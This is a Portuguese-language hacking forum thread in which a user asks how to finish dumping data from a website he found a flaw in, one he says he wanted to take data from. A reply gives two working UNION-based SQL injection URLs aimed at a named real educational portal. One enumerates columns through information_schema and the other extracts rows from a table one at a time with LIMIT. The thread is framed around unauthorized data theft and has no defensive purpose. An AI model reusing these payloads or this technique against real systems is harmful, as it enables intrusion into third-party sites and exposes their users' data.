Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Site Nukado ou Há Solução?

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Site Nukado ou Há Solução?

    Seguinte galera,
    Há uns dias atrás consegui uma falha de um site que eu queria pegar uns dados:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Daí cheguei a achar uma falha no Sistema desse virtual que foi a:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Porém existem algumas dúvidas e já procurei auxilio com um parceiro aqui do Forum e não conseguimos resolver.

    Bem, gostaria de saber se O BD que eu to tentando explorar é o mesmo do Link que citei acima,
    e a MAIOR dúvida: Quando pedimos pra exibir determinada tabela, e escolhemos uma coluna, o Conteúdo da Coluna não é exibido,
    Ou seja, só consigo explorar até a "coluna" depois disso nada mais pode ser feito! Alguém ai consegue apresentar uma solução?

    Desde Já muito Obrigado,
    se postei no lugar errado me desculpem!

  • Font Size
    #2
    Postado Originalmente por danielccbrandao Ver Post
    Seguinte galera,
    Há uns dias atrás consegui uma falha de um site que eu queria pegar uns dados:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Daí cheguei a achar uma falha no Sistema desse virtual que foi a:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Porém existem algumas dúvidas e já procurei auxilio com um parceiro aqui do Forum e não conseguimos resolver.

    Bem, gostaria de saber se O BD que eu to tentando explorar é o mesmo do Link que citei acima,
    e a MAIOR dúvida: Quando pedimos pra exibir determinada tabela, e escolhemos uma coluna, o Conteúdo da Coluna não é exibido,
    Ou seja, só consigo explorar até a "coluna" depois disso nada mais pode ser feito! Alguém ai consegue apresentar uma solução?

    Desde Já muito Obrigado,
    se postei no lugar errado me desculpem!
    Existem colunas vazias, e outras sao muito grandes para usar concat
    Tem de tirar os dados um de cada vez, para isso basta usar o LIMIT.
    Para ver os dados ao pouco basta, LIMIT 1,1 -> LIMIT 1,2 -> LIMIT 1,3 -> etc..

    Exemplo:

    Colunas
    Código:
    https://feics.virtualclass.com.br/FEICS/Usuario/Portal/Educacional/Vestibular/VerificaAprovacao.jsp?IDS=67&IDProcesso=16+AND+1=0+UNION+ALL+SELECT+1,group_concat(column_name),3 from information_schema.columns where table_name=0x41545f4167656e6461--

    Dados
    Código:
    https://feics.virtualclass.com.br/FEICS/Usuario/Portal/Educacional/Vestibular/VerificaAprovacao.jsp?IDS=67&IDProcesso=16+AND+1=0+UNION+ALL+SELECT+1,IDAvaliacao,3 from AT_Avaliacao limit 1,1--
    "Respect your efforts, respect yourself. Self-respect leads to self-discipline.
    When you have both firmly under your belt, that's real power."

    Comment

    X
    Working...
    X